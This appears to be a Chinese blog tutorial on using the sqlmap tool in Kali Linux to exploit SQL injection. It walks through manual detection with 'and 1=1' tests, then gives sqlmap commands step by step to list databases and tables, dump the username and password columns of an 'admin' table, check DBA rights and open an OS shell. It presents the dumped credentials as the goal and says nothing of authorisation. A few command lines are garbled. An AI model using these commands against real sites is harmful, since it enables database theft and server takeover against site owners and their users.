kali基于sqlmap的使用

生活中,最使人疲惫的往往不是道路的遥远,而是心中的郁闷;最使人痛苦的往往不是生活的不幸,而是希望的破灭;最使人颓废的往往不是前途的坎坷,而是自信的丧失;最使人绝望的往往不是挫折的打击,而是心灵的死亡。所以我们要有自己的梦想,让梦想的星光指引着我们走出落漠,走出惆怅,带着我们走进自己的理想。

导读:本篇文章讲解 kali基于sqlmap的使用,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com,来源:原文

介绍:

        SQL注入是指攻击者通过把恶意SQL命令插入到web表单的输入域或页面请求的查询字符串中,并且插入的恶意SQL命令会导致原有SQL语句作用发生改变,从而欺骗服务器执行恶意的SQL命令的一种攻击方式

测试过程


        形如,一条网页的链接为http://888.cn/?id=1,可以清楚看到链接后边有一串形如?id=1的字符。 这时只要在链接后边加上 and+1=1,如果页面显示正常没有出现报错,则再将and+1=1 替换为 and+1=2,此时如果页面出现报错,可以判断存在注入攻击点

以上为手注实现判断,今天讲解sql注入的自动化工具sqlmap,工具kali自带。

1.检测注入点

sqlmap -u URL

kali基于sqlmap的使用

 可以检测到id参数存在注入点

2.爆出所有数据库信息

sqlmap -u URL –dbs

kali基于sqlmap的使用

 可以看出当前站点有三个数据库,名称如图

3.爆出当前数据库信息

sqlmap -u URL –current-db

kali基于sqlmap的使用

 可以看出当前数据库名称为 ‘maoshe

4.指定库名列出所有表

sqlmap -u URL -D maoshe –tables

kali基于sqlmap的使用

可以卡出当前数据库下的所有表名,找到有敏感信息的表名admin

 5.指定库名表名列出所有字段

sqlmap -u URL -D maoshe -T admin –columns

kali基于sqlmap的使用

 可以看出当前表名下的字段名

6.指定库名表名dump出指定字段

sqlmap -u URL -D maoshe -T admin -C Id,password,username –dump

kali基于sqlmap的使用

 可以看出当前的用户名密码了,ok,拿到账号密码。

补充

查询是否有sql注入dba权限

sqlmap -u URL –is-dba

kali基于sqlmap的使用

 此站显然没有如有应为True,如为True情况下执行如下,弹出shell即可拿下,一般不能实现。

sqlmap -u URL -os-shell

PS:(1)当你sqlmap时如果要默认选项全是y时
           sqlmap -u URL –batchsqlsqlmsql
      (2)sqlmap扫描无法连接信息 (将sqlmap值改为任意值)
           sqlmap -u URL –random-agent (-D mian_域名 –tables)

总结

SQL注入攻击是通过操作输入来修改SQL语句在post/getweb表单、输入域名或页面请求的查询字符串中插入SQL命令,最终使web服务器执行恶意命令的过程。

 window下安装sqlmap教程如下

https://blog.csdn.net/baigoocn/article/details/51456721

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/140159.html

(0)
飞熊的头像飞熊bm

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!